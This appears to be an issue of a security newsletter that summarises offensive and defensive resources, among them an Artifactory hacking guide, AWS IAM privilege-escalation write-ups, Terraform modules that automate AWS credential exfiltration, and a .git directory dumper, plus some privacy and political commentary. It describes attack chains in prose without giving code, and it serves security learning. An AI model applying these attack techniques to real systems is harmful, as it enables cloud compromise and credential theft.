Artifactory Hacking Guide
Nice overview by Guillaume Quéré: default users and passwords, checking account permissions and listing users, high severity known vulnerabilities, post exploitation, and how to defend it.
New project by Daniel García that aims to make it easy to integrate HTTP API tools into execution chains, where the output and input of each is JSON, so you can pipe things together like *NIX tools. This approach reminds of Daniel Miessler’s approach in his Red Team Village talk, Mechanizing the Methodology.
Java RMI for pentesters: structure, recon and communication (non-JMX Registries)
Łukasz Mikuła describes what RMI (Remote Method Invocation) interfaces are (tl;dr: expose Java RPC calls over the network), how to build one from source, what info you can learn about an RMI interface using an Nmap scan, how to build an RMI client, and what are typical issues and stack traces you encounter when dealing with RMIs and what they mean.
An opinionated guide on how to conduct a web application security assessment by NCC Group’s Tanner Prynn covering a range of topics including application mapping, reviewing the design, authentication and authorization, frontend attacks, input handling, & cryptography.
@Mastering Burp Suite Pro
Twitter account full of Burp tips by Nicolas Grégoire, creator of a popular Burp Suite training course.
AWS IAM explained for Red and Blue teams
Nice overview by Federico Lago.
A tool to detect a set of common Google Kubernetes Engine misconfigurations.
Exploiting fine-grained AWS IAM permissions for total cloud compromise: a real world example (part 1/2)
Nice write-up by Federico Lago describing a testing flow: Hadoop instance with an exposed unauthenticated ResourceManager service -> RCE with Metasploit -> AWS access keys in
core-site.xml -> enumerate permissions with enumerate-iam -> check for privilege escalation with aws_escalate.py -> enumerate S3 buckets you can read -> more AWS creds, and more.
Amazon Detective introduces IAM Role Session Analysis
“Amazon Detective now analyzes IAM role sessions so that you can visualize and understand the actions that users and apps have performed using assumed roles. Detective enables you to answer questions such as “which federated user invoked APIs that are associated with a security finding?”, “what API calls did a user invoke across a chain of role assumptions?”, “What API activity did an EC2 instance perform?” and “which of my users use this cross-account role?”, all without manually analyzing CloudTrail logs.”
Introducing mutual TLS authentication for Amazon API Gateway
“AWS is introducing certificate-based mTLS authentication for Amazon API Gateway. This is a new method for client-to-server authentication that can be used with API Gateway’s existing authorization options.”
EkoParty Advanced Fuzzing Workshop
Exercises and slides by Antonio Morales.
Beware of the Shadowbunny - Using virtual machines to persist and evade detections
Johann Rehberger describes an attacker tactic of deploying a VM on a target host to pivot, provide persistence, and at the same time evade detection.
Terraform modules to automatically exploit certain AWS scenarios, like copying a publicly exposed EBS snapshot, spinning up a Lambda to exfiltrate an AWS temporary credential, and more.
Politics / Privacy
Blacklight by The Markup
Blacklight is a service that will visit a provided URL with a headless browser that fingerprints ad trackers, third-party cookies, session recording services, if it captures keystrokes, and if there are certain Facebook or Google analytics on it.
The data dump that reveals the astonishing breadth of Beijing’s interference operations
China is systematically gathering information on politically or otherwise important people around the world so that they can influence them. Not surprising, but concerning. See relevant snippets on the blog.
The Dumpster Fire that is U.S. Politics
It seems almost impossible to even keep track of current events, but here are a few things that happened recently: the NY Times obtained two decades of the President's tax returns and deep dived into what they found, the 2016 Trump campaign paid for Facebook ads to discourage 3.5 million black Americans in battleground states from voting, the first debate was a $*@#-show. More details on the blog.
By Liam Galvin: Downloads git repositories and extracts their contents from sites where the
.git directory has been mistakenly uploaded. It can still recover a significant portion of a repo even where directory listings are disabled.
A list of subdomains for publicly listed programs.
A framework for effective corporate communication after cyber security incidents
Paper by academics that lays out a framework for how organizations should communicate after a security incident. The paper has some great overview figures, so I pulled them out into a quick summary blog post.
Thanks for reading!